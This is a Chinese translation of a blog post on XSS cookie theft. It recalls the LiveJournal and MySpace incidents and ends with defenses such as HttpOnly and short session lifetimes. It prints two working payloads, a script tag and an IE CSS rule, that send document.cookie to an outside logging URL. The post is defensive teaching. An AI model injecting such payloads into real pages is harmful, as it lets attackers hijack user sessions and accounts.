譯者按: 10 年前的博客似乎有點老了,但是XSS 攻擊的威脅依然還在,我們不得不防。
- 原文: XSS - Stealing Cookies 101
- 譯者: Fundebug
本文采用意譯,版權歸原作者所有
竊取Cookie是非常簡單的,因此不要輕易相信客戶端所聲明的身份。即便這個Cookie是在數秒之前驗證過,那也未必是真的,尤其當你僅使用Cookie驗證客戶端的時候。
2006 年 1 月,LiveJournal遭到了XSS攻擊,這個事件足以警示我們。還有,2006 年 10 月,MySapce也遭到了XSS攻擊,這告訴我們必須非常謹慎地過濾用戶發佈的文本,因爲黑客可以在文本中摻雜一些 JavaScript 代碼,以此竊取登陸用戶的Cookie。
正如黑客攻擊LiveJournal那樣,你不需要在登陸用戶的瀏覽器進行任何操作,而可以在第三方進行所有操作。更糟糕的是,竊取Cookie事實上操作起來非常簡單,但是防範起來卻非常困難。
下面的的 JavaScript 代碼就可以竊取Cookie,是不是很簡單?
<script>
new Image().src =
"http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);
</script>如果我可以將這段代碼插入到某個登陸用戶的頁面,則Cookie就會通過 HTTP 請求發送給我,然後我就可以僞造那個可憐的登陸用戶了!
在 IE 瀏覽器上,可以通過在 CSS 代碼中執行 JavaScript 來竊取Cookie,也很簡單。
<style>
.getcookies{
background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');
}
</style>
<p class="getcookies"></p>如果你對用戶發佈的文本內容不進行嚴格的過濾的話,黑客就可以很方便地竊取Cookie。是不是很可怕?如果你是一個負責任的開發者的話,你就應該保持警惕!因此,你必須假設所有用戶的Cookie都被竊取了。注意,是所有用戶,對於這一點,我不想含糊其辭。
爲了保證安全:請不停地重設session的重設;將過期時間設置短一些;監控referrer與userAgent的值;使用HttpOnly禁止腳本讀取Cookie。這些措施並非萬無一失,但是增加了黑客的難度,因此也是有效的。
如果你對MySapce遭到的XSS攻擊不瞭解,可以查看黑客本人公開的技術細節,很有趣,不過切勿模仿,因爲他爲自己的行爲此付出了不小的代價:三年內被禁止使用電腦!。
參考鏈接
- 9.3 避免 XSS 攻擊
- Technical explanation of The MySpace Worm
- Account Hijackings Force LiveJournal Changes
關於Fundebug
Fundebug專注於JavaScript、微信小程序、微信小遊戲、支付寶小程序、React Native、Node.js和Java線上應用實時BUG監控。 自從2016年雙十一正式上線,Fundebug累計處理了10億+錯誤事件,付費客戶有Google、360、金山軟件、百姓網等衆多品牌企業。歡迎大家免費試用!
版權聲明
轉載時請註明作者Fundebug以及本文地址:
https://blog.fundebug.com/2017/08/16/xss_steal_cookie/